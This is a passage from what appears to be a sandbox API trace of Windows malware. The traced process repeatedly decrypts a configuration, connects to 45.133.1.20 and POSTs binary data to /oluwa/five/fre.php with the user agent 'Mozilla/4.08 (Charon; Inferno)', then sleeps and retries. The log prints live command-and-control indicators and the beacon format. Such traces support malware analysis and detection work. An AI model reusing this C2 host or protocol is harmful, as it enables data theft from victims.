(lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0316.673] GetProcessHeap () returned 0x6a0000 [0316.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0316.673] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0316.674] GetProcessHeap () returned 0x6a0000 [0316.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0316.674] socket (af=2, type=1, protocol=6) returned 0xc2c [0316.674] connect (s=0xc2c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0316.699] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0316.699] GetProcessHeap () returned 0x6a0000 [0316.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0316.699] GetProcessHeap () returned 0x6a0000 [0316.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0316.700] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.701] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0316.701] GetProcessHeap () returned 0x6a0000 [0316.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df628 [0316.701] GetProcessHeap () returned 0x6a0000 [0316.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0316.702] GetProcessHeap () returned 0x6a0000 [0316.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0316.702] GetProcessHeap () returned 0x6a0000 [0316.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0316.703] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.704] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0316.704] GetProcessHeap () returned 0x6a0000 [0316.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0316.704] GetProcessHeap () returned 0x6a0000 [0316.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0316.705] send (s=0xc2c, buf=0x6bd460*, len=242, flags=0) returned 242 [0316.705] send (s=0xc2c, buf=0x6bb998*, len=159, flags=0) returned 159 [0316.706] GetProcessHeap () returned 0x6a0000 [0316.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0316.706] recv (in: s=0xc2c, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0316.777] GetProcessHeap () returned 0x6a0000 [0316.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0316.778] GetProcessHeap () returned 0x6a0000 [0316.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0316.779] GetProcessHeap () returned 0x6a0000 [0316.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df628 | out: hHeap=0x6a0000) returned 1 [0316.779] GetProcessHeap () returned 0x6a0000 [0316.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0316.779] closesocket (s=0xc2c) returned 0 [0316.780] GetProcessHeap () returned 0x6a0000 [0316.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0316.781] GetProcessHeap () returned 0x6a0000 [0316.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0316.781] GetProcessHeap () returned 0x6a0000 [0316.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0316.782] GetProcessHeap () returned 0x6a0000 [0316.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0316.783] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1994) returned 0xc2c [0316.786] Sleep (dwMilliseconds=0xea60) [0316.787] GetProcessHeap () returned 0x6a0000 [0316.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0316.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.789] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.794] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0316.824] GetProcessHeap () returned 0x6a0000 [0316.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8238 [0316.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.825] CryptImportKey (in: hProv=0x6beca0, pbData=0x6d8238, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0316.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.835] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.836] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.836] GetProcessHeap () returned 0x6a0000 [0316.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8238 | out: hHeap=0x6a0000) returned 1 [0316.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.913] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0316.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.916] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0316.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.917] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0316.918] GetProcessHeap () returned 0x6a0000 [0316.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0316.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.919] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.920] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.922] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.923] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.923] GetProcessHeap () returned 0x6a0000 [0316.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0316.923] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0316.924] GetProcessHeap () returned 0x6a0000 [0316.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0316.924] GetProcessHeap () returned 0x6a0000 [0316.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0316.925] GetProcessHeap () returned 0x6a0000 [0316.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0316.925] GetProcessHeap () returned 0x6a0000 [0316.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0316.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.928] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.934] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0316.989] GetProcessHeap () returned 0x6a0000 [0316.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0316.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.992] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0316.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.993] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.994] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.994] GetProcessHeap () returned 0x6a0000 [0316.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0316.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.996] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0316.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.998] CryptDestroyKey (hKey=0x6ad520) returned 1 [0316.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.999] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0316.999] GetProcessHeap () returned 0x6a0000 [0316.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0317.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.000] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0317.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.001] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0317.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.004] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0317.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.005] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0317.005] GetProcessHeap () returned 0x6a0000 [0317.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0317.005] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0317.005] GetProcessHeap () returned 0x6a0000 [0317.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0317.005] socket (af=2, type=1, protocol=6) returned 0xc30 [0317.006] connect (s=0xc30, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0317.032] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0317.032] GetProcessHeap () returned 0x6a0000 [0317.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0317.032] GetProcessHeap () returned 0x6a0000 [0317.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0317.033] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0317.035] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0317.035] GetProcessHeap () returned 0x6a0000 [0317.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df3e8 [0317.035] GetProcessHeap () returned 0x6a0000 [0317.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0317.037] GetProcessHeap () returned 0x6a0000 [0317.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0317.037] GetProcessHeap () returned 0x6a0000 [0317.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0317.038] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0317.039] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0317.039] GetProcessHeap () returned 0x6a0000 [0317.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0317.039] GetProcessHeap () returned 0x6a0000 [0317.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0317.040] send (s=0xc30, buf=0x6bd460*, len=242, flags=0) returned 242 [0317.041] send (s=0xc30, buf=0x6bb998*, len=159, flags=0) returned 159 [0317.041] GetProcessHeap () returned 0x6a0000 [0317.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0317.041] recv (in: s=0xc30, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0317.118] GetProcessHeap () returned 0x6a0000 [0317.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0317.119] GetProcessHeap () returned 0x6a0000 [0317.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0317.121] GetProcessHeap () returned 0x6a0000 [0317.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df3e8 | out: hHeap=0x6a0000) returned 1 [0317.121] GetProcessHeap () returned 0x6a0000 [0317.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0317.122] closesocket (s=0xc30) returned 0 [0317.123] GetProcessHeap () returned 0x6a0000 [0317.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0317.123] GetProcessHeap () returned 0x6a0000 [0317.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0317.125] GetProcessHeap () returned 0x6a0000 [0317.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0317.125] GetProcessHeap () returned 0x6a0000 [0317.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0317.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1998) returned 0xc30 [0317.128] Sleep (dwMilliseconds=0xea60) [0317.130] GetProcessHeap () returned 0x6a0000 [0317.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0317.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.132] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.141] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0317.155] GetProcessHeap () returned 0x6a0000 [0317.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0317.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.159] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0317.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.172] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.174] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.174] GetProcessHeap () returned 0x6a0000 [0317.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0317.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.175] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0317.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.177] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0317.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.178] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0317.178] GetProcessHeap () returned 0x6a0000 [0317.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0317.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.182] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.184] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.185] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.186] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.186] GetProcessHeap () returned 0x6a0000 [0317.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0317.186] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0317.187] GetProcessHeap () returned 0x6a0000 [0317.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0317.187] GetProcessHeap () returned 0x6a0000 [0317.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0317.187] GetProcessHeap () returned 0x6a0000 [0317.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0317.188] GetProcessHeap () returned 0x6a0000 [0317.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0317.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.196] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0317.207] GetProcessHeap () returned 0x6a0000 [0317.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0317.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.209] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0317.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.210] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.215] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.215] GetProcessHeap () returned 0x6a0000 [0317.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0317.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.217] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0317.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.218] CryptDestroyKey (hKey=0x6ad020) returned 1 [0317.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.219] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0317.219] GetProcessHeap () returned 0x6a0000 [0317.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0317.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.221] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0317.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.222] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0317.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.226] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0317.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.228] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0317.228] GetProcessHeap () returned 0x6a0000 [0317.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0317.228] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0317.228] GetProcessHeap () returned 0x6a0000 [0317.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0317.228] socket (af=2, type=1, protocol=6) returned 0xc34 [0317.228] connect (s=0xc34, 